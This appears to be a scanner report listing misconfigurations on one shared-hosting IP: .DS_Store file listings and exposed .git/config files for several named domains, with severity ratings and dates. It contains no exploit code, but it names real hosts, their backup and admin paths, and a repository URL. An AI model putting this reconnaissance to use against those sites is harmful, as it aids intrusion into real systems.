Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-14 16:04 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-10 18:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af247251dec61f970f3a6842d5ea24eb2f28027Found 9 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /config /public /resources /storage /vendor
Found on 2024-08-02 17:06 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-07-26 23:01 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-06-10 06:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-05-08 19:01 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-03-21 16:27
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: sophie.austynandbrian.com
Port: 443
URL: https://sophie.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-14 05:06
Open for 660 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-14 05:06
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.kumarandesign.manmachinemixedmedia.com
Port: 443
URL: https://www.kumarandesign.manmachinemixedmedia.comFirst seen 2022-10-20 18:31
Last seen 2024-09-14 04:16
Open for 694 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d83fa5bcae254fbb4f2bc97ef927c132d4Found 8 files trough .DS_Store spidering: /javascript /site.psd /site_index.jpg /site_projectlist.jpg /site_selectedproject.jpg /site_work.jpg /siteimages /type
Found on 2024-09-14 04:16
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-16 18:43
Last seen 2024-09-14 02:20
Open for 667 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-14 02:20 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-05-30 12:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: website-cddaef1b.violetmemoire.com
Port: 80
URL: http://website-cddaef1b.violetmemoire.comFirst seen 2024-08-14 23:50
Last seen 2024-09-14 01:43
Open for 30 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-14 01:43
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:31
Last seen 2024-09-12 13:14
Open for 72 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-12 13:14376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-12 07:35
Open for 25 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-12 07:35
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:30
Last seen 2024-09-08 18:06
Open for 68 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-08 18:06376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-23 18:39
Last seen 2024-09-08 15:26
Open for 654 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-08 15:26
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
IP: 162.241.253.33
Domain: website-c38e9220.mio.nqp.mybluehost.me
Port: 80
URL: http://website-c38e9220.mio.nqp.mybluehost.meFirst seen 2024-07-02 03:22
Last seen 2024-09-08 10:00
Open for 68 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-08 10:00376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-16 18:43
Last seen 2024-09-08 07:58
Open for 661 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-08 07:58 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-06-06 02:34
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:41
Last seen 2024-09-08 07:25
Open for 68 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-08 07:25376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-23 17:37
Last seen 2024-09-08 03:03
Open for 715 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-08 03:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-08 02:31
Open for 21 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-08 02:31
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
IP: 162.241.253.33
Domain: www.website-c38e9220.mio.nqp.mybluehost.me
Port: 80
URL: http://www.website-c38e9220.mio.nqp.mybluehost.meFirst seen 2024-07-02 04:27
Last seen 2024-09-06 16:03
Open for 66 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-06 16:03376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-05-23 18:19
Last seen 2024-09-03 23:27
Open for 469 days-
Severity: high
Fingerprint: 5f32cf5d6962f09cb1c4b1dfb1c4b1df6d5e0c16f8e804616ad31eb847c538b8Found 61 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /handouts/AfterTheStormFront.pdf /images /images/_notes /images/air-movers.jpg /images/big-logo.jpg /images/favicon.ico /images/fire-damage.png /images/grabbing.png /images/icon_FB.png /images/icon_GOOGLE.png /images/icon_MAMMOTH.png /images/icon_WEB.png /images/loader.gif /images/loader@2x.gif /images/logo.png /images/logo@2x.png /images/Mammoth-about.png /images/mammoth-palm-beach.jpg /images/mold.png /images/placeholder-1160x480.png /images/placeholder-1160x480@2x.png /images/placeholder-1800x1200.png /images/placeholder-1800x1200@2x.png /images/placeholder-380x253.png /images/placeholder-380x253@2x.png /images/placeholder-380x468.png /images/placeholder-380x468@2x.png /images/placeholder-800x533.png /images/placeholder-800x533@2x.png /images/sample-typography.png /images/sample-typography@2x.png /images/water-damage.jpg /images/water.png /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-09-03 23:27 -
Severity: high
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb30059779a6c140e652b13f48c0be8852fFound 29 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-06-18 06:45 -
Severity: high
Fingerprint: 5f32cf5d6962f09c7c3d3e457c3d3e458d83a3f48a8cfb7b13aedafabce51a8aFound 30 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /handouts/AfterTheStormFront.pdf /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-05-08 17:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sydney.austynandbrian.com
Port: 80
URL: http://www.sydney.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-02 09:06
Open for 648 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-02 09:06
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-12 18:37
Last seen 2024-09-01 01:16
Open for 628 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-01 01:16
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-24 17:52
Last seen 2024-08-26 19:20
Open for 672 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-08-26 19:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-24 17:52
Last seen 2024-08-26 19:20
Open for 672 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-08-26 19:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-12 18:37
Last seen 2024-08-18 04:54
Open for 614 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-08-18 04:54
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.hazel.austynandbrian.com
Port: 80
URL: http://www.hazel.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2024-08-16 14:28
Open for 692 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-08-16 14:28
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2024-07-08 19:34
Open for 626 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 19:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-19 18:39
Last seen 2024-07-08 18:35
Open for 504 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 18:35
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-19 18:39
Last seen 2024-07-08 18:35
Open for 504 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 18:35
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-22 18:47
Last seen 2024-07-08 16:56
Open for 563 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 16:56
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2024-07-08 16:11
Open for 625 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 16:11
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2024-07-08 13:29
Open for 625 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 13:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-22 18:29
Last seen 2024-07-08 12:36
Open for 501 days-
Severity: low
